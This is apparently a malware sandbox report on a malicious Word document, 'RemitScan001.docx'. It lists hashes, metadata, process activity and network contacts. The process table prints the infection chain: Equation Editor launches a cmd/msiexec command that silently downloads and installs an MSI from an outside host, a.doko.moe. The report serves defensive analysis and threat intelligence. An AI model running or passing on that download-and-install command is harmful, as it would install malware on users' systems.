File name: | RemitScan001.docx |
Full analysis: | https://app.any.run/tasks/2599ba9f-c0d2-458a-a518-1274f04e4126 |
Verdict: | Malicious activity |
Analysis date: | November 15, 2018, 08:26:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 8F4CA353F1100C00124B3509DC90B9F1 |
SHA1: | 5F9134A3C66FA882A6DE0863A9618E6D559E255F |
SHA256: | E4919995928FC65C2B283E7EF2569C31BC71C1DA4D56662D1708403228FA5658 |
SSDEEP: | 3072:k7lL2mrdFADYhDFc8rpKSvNYbWRDzUyRBelYc3nTMSFm9d+tlKEfdw:k7lCAdFkYhDFBxvqyRmTMSFmfSq |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
Description: | - |
---|---|
Creator: | Windows User |
Subject: | - |
Title: | - |
ModifyDate: | 2018:10:29 23:18:00Z |
---|---|
CreateDate: | 2018:10:29 23:18:00Z |
RevisionNumber: | 2 |
LastModifiedBy: | Richard |
Keywords: | - |
AppVersion: | 15 |
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 1 |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | - |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 1 |
Words: | - |
Pages: | 1 |
TotalEditTime: | 1 minute |
Template: | template.dotx |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1364 |
ZipCompressedSize: | 351 |
ZipCRC: | 0x2ea8411c |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3904 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\RemitScan001.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
840 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3516 | cmd.exe & /C CD C: & msiexec.exe /i https://a.doko.moe/shuipl.msi /quiet | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1619 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2704 | msiexec.exe /i https://a.doko.moe/shuipl.msi /quiet | C:\Windows\system32\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2472 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
4032 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2316 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\loanchanges.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAE2D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{5B600270-0902-4FF1-AF5B-0DC8F1891341} | — | |
MD5:— | SHA256:— | |||
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{3717B99C-9174-4034-A98A-CECC372D3753} | — | |
MD5:— | SHA256:— | |||
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2EE40392.jpeg | — | |
MD5:— | SHA256:— | |||
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{60305BDB-AA82-4EDA-9B2C-10C97B61B240}.tmp | — | |
MD5:— | SHA256:— | |||
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AFAC4FC4-F0AB-47E3-9AB1-9C1DA307B814}.tmp | — | |
MD5:— | SHA256:— | |||
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4B045517-C02D-4DF5-BEE5-EA3C384FBC8B}.tmp | — | |
MD5:— | SHA256:— | |||
3904 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FA23CA01-16B8-41D1-B398-603BE726FFE3}.tmp | — | |
MD5:— | SHA256:— | |||
2316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4F65.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3904 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70 | binary | |
MD5:DA6C793FB0533AF0139A6D76C9956547 | SHA256:BCEC4BFFD8EE03E0FDF1C1577EF4635AC08DB1F94CF07B0C406A6B3A171E9E1D |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3904 | WINWORD.EXE | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
980 | svchost.exe | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
2472 | msiexec.exe | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
Domain | IP | Reputation |
---|---|---|
a.doko.moe |
| unknown |